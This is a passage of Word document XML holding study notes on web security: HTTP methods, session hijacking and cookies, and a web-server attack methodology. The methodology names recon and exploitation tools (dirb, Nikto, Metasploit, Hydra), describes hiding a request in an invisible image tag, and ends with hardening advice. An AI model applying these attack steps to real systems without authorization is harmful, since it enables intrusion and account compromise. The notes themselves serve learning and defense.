    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>POST - sending data to the server</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>GET - receiving data from the server</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A GET tag can easily be hidden inside an image tag. You could create a website which has an image tag that has a size of 0 so won't show up on the page. Then when you visit the page your pc will run the GET command as it is hidden inside the html of the image </w:t>
      </w:r>
      <w:r w:rsidR="00124068">
        <w:t xml:space="preserve">tag. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Putting together an </w:t>
      </w:r>
      <w:r w:rsidR="00124068">
        <w:t>attack</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> where </w:t>
      </w:r>
      <w:r w:rsidR="00124068">
        <w:t>I</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> can get you to go to a page without you being aware that you are </w:t>
      </w:r>
      <w:r w:rsidR="00124068">
        <w:t>going</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to the page. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009606AB" w:rsidRDefault="009606AB" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>**Session hijacking &amp; Session based attack</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">HTTP is a good protocol for transferring data between a web server and a client. It was never designed with web applications in mind. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">HTTP was basically designed to share documents which contain links to other documents. </w:t>
      </w:r>
      <w:r w:rsidR="008812E8">
        <w:t>For</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> scientists to share papers with each other.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Web server has no logic to </w:t>
      </w:r>
      <w:r w:rsidR="00124068">
        <w:t>keep</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> track of</w:t>
      </w:r>
      <w:r w:rsidR="002D46C5">
        <w:t xml:space="preserve"> sessions. Web applications had to be designed</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to keep track of </w:t>
      </w:r>
      <w:r w:rsidR="002D46C5">
        <w:t xml:space="preserve">open </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">sessions. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Imagine shopping on Amazon.co.uk, the website will create a session ID for you. This </w:t>
      </w:r>
      <w:r w:rsidR="00124068">
        <w:t>will</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> be linked to your cart, account and possibly bank details. If somebody was able to hijack your </w:t>
      </w:r>
      <w:r w:rsidR="00124068">
        <w:t>session</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ID what could they do??</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>A cookie is a way of storing session ID. A server puts cookies on your pc which will allow the webserver to identify you again next time you visit their site.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">When you visit a website it will send a GET cookie command to your pc to see if it has placed a cookie there previously. </w:t>
      </w:r>
      <w:r w:rsidR="008812E8">
        <w:t>It</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> then checks the cookie against </w:t>
      </w:r>
      <w:r w:rsidR="00124068">
        <w:t>its</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> database to work out who you are and try and personalise bits for your experience.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005117C6" w:rsidRDefault="005117C6" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005117C6" w:rsidRDefault="005117C6" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:t>**Hacking Web Server</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005117C6" w:rsidRDefault="00ED02F5" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Hack the web server as a pivot point. Normally you’d hack the web server but really you’ll be after the DB behind it. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED02F5" w:rsidRDefault="00ED02F5" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Windows IIS server – Internet Information Server. Feature on Windows Server.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED02F5" w:rsidRDefault="00ED02F5" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Apache web server </w:t>
      </w:r>
      <w:r w:rsidR="00CD693F">
        <w:t>–</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CD693F">
        <w:t>most of the Internet</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E26FAF" w:rsidRDefault="00E26FAF" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Footprinting</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00E26FAF" w:rsidRDefault="00E26FAF" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Email</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E26FAF" w:rsidRDefault="00E26FAF" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Harvester – harvest details from site like sub-domains</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E26FAF" w:rsidRDefault="00E26FAF" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Look for user accounts from emails</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E26FAF" w:rsidRDefault="00E26FAF" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Whois</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> search</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E26FAF" w:rsidRDefault="00E26FAF" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>DNS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E26FAF" w:rsidRDefault="00E26FAF" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Look through site</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E26FAF" w:rsidRDefault="00E26FAF" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Get as much information as possible</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E26FAF" w:rsidRDefault="00E26FAF" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>“Powered by….”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E26FAF" w:rsidRDefault="00E26FAF" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Source code</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E26FAF" w:rsidRDefault="00E26FAF" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Robots.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CD693F" w:rsidRDefault="00CD693F" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Scan ports</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E26FAF" w:rsidRDefault="00E26FAF" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Open ports</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E26FAF" w:rsidRDefault="00E26FAF" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Filtered ports</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CD693F" w:rsidRDefault="00CD693F" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Enumerate</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E26FAF" w:rsidRDefault="009C7BD0" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Use different tools</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C7BD0" w:rsidRDefault="009C7BD0" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Dirb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to find directories – 200 code is good</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000748A0" w:rsidRDefault="000748A0" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dirbuster</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00CD693F" w:rsidRDefault="00CD693F" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Vulnerability scans</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E26FAF" w:rsidRDefault="009C7BD0" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Run OpenVAS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C7BD0" w:rsidRDefault="009C7BD0" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Import into </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Metasploit_db</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="009C7BD0" w:rsidRDefault="009C7BD0" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Nikto</w:t>
      </w:r>
      <w:r w:rsidR="00F468DA">
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00F468DA">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>nikto</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00F468DA">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> –h </w:t>
      </w:r>
      <w:hyperlink w:history="1">
        <w:r w:rsidR="00F468DA" w:rsidRPr="00CF6AEE">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:i/>
          </w:rPr>
          <w:t>http://&lt;target</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00F468DA">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> URL&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E26FAF" w:rsidRDefault="00E26FAF" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Exploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C7BD0" w:rsidRDefault="00F468DA" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Searchsploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r w:rsidR="009C7BD0">
        <w:t>Search for exploits</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F468DA" w:rsidRDefault="00F468DA" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F468DA" w:rsidRDefault="00F468DA" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Intercept proxy – </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F468DA">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>burpsuite</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00F468DA" w:rsidRDefault="00F468DA" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>OWASP ZAP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F468DA" w:rsidRDefault="00F468DA" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Hydra – brute force</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F468DA" w:rsidRDefault="00F468DA" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Medusa – brute force</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F468DA" w:rsidRDefault="00F468DA" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CD693F" w:rsidRDefault="00CD693F" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00573435">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Different type of vulnerabilities</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00993316" w:rsidRDefault="00993316" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Operating System </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Vulnz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00CD693F" w:rsidRDefault="00993316" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Is the system patching schedule up to date?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00573435" w:rsidRDefault="00573435" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Disable unnecessary services – close ports</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00993316" w:rsidRDefault="00CD693F" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Application </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>V</w:t>
      </w:r>
      <w:r w:rsidR="00993316">
        <w:t>ulnz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00CD693F" w:rsidRDefault="00993316" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">SQL </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>db</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> back end is it input sanitised</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00993316" w:rsidRDefault="00F87487" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Misconfiguration</w:t>
      </w:r>
      <w:r w:rsidR="00CD693F">
        <w:t xml:space="preserve"> errors</w:t>
      </w:r>
      <w:r w:rsidR="00993316">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CD693F" w:rsidRDefault="00993316" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Don’t leave default settings. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Wordpress</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> server installed – is it credentials changed?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00993316" w:rsidRDefault="00993316" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Disable default user accounts after giving hard </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00993316" w:rsidRDefault="00993316" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>“.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>conf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>” files – disallow, change permissions</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00993316" w:rsidRDefault="00993316" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Directory listings – disabled!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00993316" w:rsidRDefault="00993316" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Poor or no security controls. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00993316" w:rsidRDefault="00993316" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Encryption – use when it is available</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00993316" w:rsidRDefault="00E26FAF" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>--</w:t>
      </w:r>
      <w:r w:rsidR="00993316">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00993316" w:rsidRDefault="00993316" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">HTTP response splitting? Inject carriage return? </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00993316" w:rsidRDefault="00993316" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Web cache poisoning</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00573435" w:rsidRDefault="00573435" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Monitor logs – am I being attacked</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00573435" w:rsidRDefault="00573435" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Web application firewall</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00573435" w:rsidRDefault="00573435" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>IDS/IPS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00573435" w:rsidRDefault="00573435" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Regularly perform red team </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>vuln</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> scanning</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E26FAF" w:rsidRDefault="00E26FAF" w:rsidP="00263D34">
      <w:pPr>
